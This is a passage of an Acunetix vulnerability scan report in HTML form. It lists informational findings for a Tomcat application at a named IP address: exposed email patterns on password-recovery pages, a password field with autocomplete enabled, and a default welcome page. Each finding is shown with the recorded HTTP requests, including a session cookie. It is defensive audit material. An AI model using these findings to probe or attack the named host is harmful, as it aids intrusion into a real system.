<tr style="height: 1px"><td width="4"/><td width="11"/><td width="8"/><td width="8"/><td width="7"/><td width="94"/><td width="19"/><td width="21"/><td width="25"/><td width="11"/><td width="20"/><td width="92"/><td width="5"/><td width="37"/><td width="2"/><td width="22"/><td width="256"/><td width="8"/><td width="68"/></tr>
<tr style="height:37px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
<td colspan="19" class="s4">Generated with Acunetix WVS evaluation edition (not for commercial use)</td>
</tr>
<tr style="height:113px">
<td colspan="19" class="s43">GET /yuliana/validation/i9GOkSKFGS.jsp HTTP/1.1<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s43">HTTP/1.1 404 /yuliana/validation/i9GOkSKFGS.jsp<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Date: Sun, 26 Feb 2012 03:14:54 GMT<br>Content-Length: 7045</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/validation/displayPasswordRecovery</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s13"><br>Pattern found: <br>test@test.com<br></td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:187px">
<td colspan="19" class="s43">GET /yuliana/validation/displayPasswordRecovery HTTP/1.1<br>Pragma: no-cache<br>Acunetix-Aspect: enabled<br>Acunetix-Aspect-Password: *****<br>Acunetix-Aspect-Queries: filelist;aspectalerts<br>Referer: http://134.154.14.153:8080/yuliana/user/validation/validateUser<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Content-Length: 7795<br>Date: Sun, 26 Feb 2012 03:14:05 GMT</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/validation/passwordRecovery</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s13"><br>Pattern found: <br>test@test.com<br></td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:187px">
<td colspan="19" class="s43">GET /yuliana/validation/passwordRecovery HTTP/1.1<br>Pragma: no-cache<br>Acunetix-Aspect: enabled<br>Acunetix-Aspect-Password: *****<br>Acunetix-Aspect-Queries: filelist;aspectalerts<br>Referer: http://134.154.14.153:8080/yuliana/validation/displayPasswordRecovery<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*</td>
</tr>
<tr style="height:5px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="17" class="s26">Acunetix Website Audit</td><td colspan="2" class="s3">55</td>
</tr>
</table>
<a name="PageN56"></a>
<table width="718" border="0" cellspacing="0" cellpadding="0" class="page_break">
<tr style="height: 1px"><td width="4"/><td width="11"/><td width="8"/><td width="8"/><td width="7"/><td width="94"/><td width="19"/><td width="21"/><td width="25"/><td width="11"/><td width="20"/><td width="92"/><td width="5"/><td width="37"/><td width="2"/><td width="22"/><td width="256"/><td width="8"/><td width="68"/></tr>
<tr style="height:37px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
<td colspan="19" class="s4">Generated with Acunetix WVS evaluation edition (not for commercial use)</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Content-Length: 7844<br>Date: Sun, 26 Feb 2012 03:14:06 GMT</td>
</tr>
<tr style="height:22px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:5px">
<td/><td/><td/><td colspan="16" rowspan="2" class="s35">Password type input with autocomplete enabled</td>
</tr>
<tr style="height:21px">
<td colspan="3" class="s0" style="font-size:1px"><img src="WVSSingleScan0225.files/img32.jpg" width="24" height="24" alt=""></td>
</tr>
<tr style="height:1px">
<td colspan="19" class="s45" style="font-size:1px">&nbsp;</td>
</tr>
<tr style="height:10px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="6" class="s37">Severity</td><td colspan="13" class="s36">Informational</td>
</tr>
<tr style="height:18px">
<td colspan="6" class="s57">Type</td><td colspan="13" class="s58">Informational</td>
</tr>
<tr style="height:18px">
<td colspan="6" class="s57">Reported by module</td><td colspan="13" class="s58">Crawler</td>
</tr>
<tr style="height:11px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="19" class="s12">Description</td>
</tr>
<tr style="height:7px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:50px">
<td colspan="19" class="s13">When a new name and password is entered in a form and the form is submitted, the browser asks if the password should be saved. Thereafter when the form is displayed, the name and password are filled in automatically or are completed as the name is entered. An attacker with local access could obtain the cleartext password from the browser cache.</td>
</tr>
<tr style="height:11px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="19" class="s12">Impact</td>
</tr>
<tr style="height:7px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
<td colspan="19" class="s13">Possible sensitive information disclosure</td>
</tr>
<tr style="height:7px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="19" class="s40">Recommendation</td>
</tr>
<tr style="height:7px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:63px">
<td colspan="19" class="s13">The password autocomplete should be disabled in sensitive applications. <br>To disable autocomplete, you may use a code similar to: <br>&lt;INPUT TYPE=&quot;password&quot; AUTOCOMPLETE=&quot;off&quot;&gt;</td>
</tr>
<tr style="height:7px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="19" class="s12">Affected items</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/user/validation/validateUser</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:23px">
<td colspan="19" class="s13">Password type input named j_password from unnamed form with action j_security_check has autocomplete enabled.</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:113px">
<td colspan="19" class="s43">GET /yuliana/user/validation/validateUser HTTP/1.1<br>Host: 134.154.14.153:8080<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Connection: Keep-alive</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:128px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Pragma: No-cache<br>Cache-Control: no-cache<br>Expires: Wed, 31 Dec 1969 16:00:00 PST<br>Content-Type: text/html<br>Content-Length: 7302<br>Date: Sun, 26 Feb 2012 03:14:04 GMT</td>
</tr>
<tr style="height:22px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:5px">
<td/><td/><td/><td colspan="16" rowspan="2" class="s35">Web server default welcome page</td>
</tr>
<tr style="height:21px">
<td colspan="3" class="s0" style="font-size:1px"><img src="WVSSingleScan0225.files/img33.jpg" width="24" height="24" alt=""></td>
</tr>
<tr style="height:1px">
<td colspan="19" class="s45" style="font-size:1px">&nbsp;</td>
</tr>
<tr style="height:10px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="6" class="s37">Severity</td><td colspan="13" class="s36">Informational</td>
</tr>
<tr style="height:18px">
<td colspan="6" class="s57">Type</td><td colspan="13" class="s58">Validation</td>
</tr>
<tr style="height:18px">
<td colspan="6" class="s57">Reported by module</td><td colspan="13" class="s58">Scripting (Web_Server_Default_Welcome_Page.script)</td>
</tr>
<tr style="height:11px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="19" class="s12">Description</td>
</tr>
<tr style="height:14px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="17" class="s26">Acunetix Website Audit</td><td colspan="2" class="s3">56</td>
</tr>
</table>
<a name="PageN57"></a>
<table width="718" border="0" cellspacing="0" cellpadding="0" class="page_break">
<tr style="height: 1px"><td width="4"/><td width="11"/><td width="8"/><td width="8"/><td width="7"/><td width="94"/><td width="19"/><td width="21"/><td width="25"/><td width="11"/><td width="20"/><td width="92"/><td width="5"/><td width="37"/><td width="2"/><td width="22"/><td width="256"/><td width="8"/><td width="68"/></tr>
<tr style="height:37px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
<td colspan="19" class="s4">Generated with Acunetix WVS evaluation edition (not for commercial use)</td>
</tr>
<tr style="height:35px">
<td colspan="19" class="s13">This web server has a default welcome page. If you are not using this web server, it should be disabled because it may pose a security threat.</td>
</tr>
<tr style="height:11px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="19" class="s12">Impact</td>
</tr>
<tr style="height:7px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
<td colspan="19" class="s13">No impact is associated with this vulnerability.</td>
</tr>
<tr style="height:7px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="19" class="s40">Recommendation</td>
</tr>
<tr style="height:7px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
<td colspan="19" class="s13">If this server is not used, it is recommended to disable it.</td>
</tr>
<tr style="height:7px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="19" class="s12">Affected items</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">Web Server</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:23px">
<td colspan="19" class="s13">No details are available.</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:113px">
<td colspan="19" class="s43">GET / HTTP/1.1<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:113px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>ETag: W/&quot;8144-1201592376000&quot;<br>Last-Modified: Tue, 29 Jan 2008 07:39:36 GMT<br>Content-Type: text/html<br>Content-Length: 8144<br>Date: Sun, 26 Feb 2012 03:14:06 GMT</td>
</tr>
<tr style="height:484px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="17" class="s26">Acunetix Website Audit</td><td colspan="2" class="s3">57</td>
</tr>
</table>
</body></html>

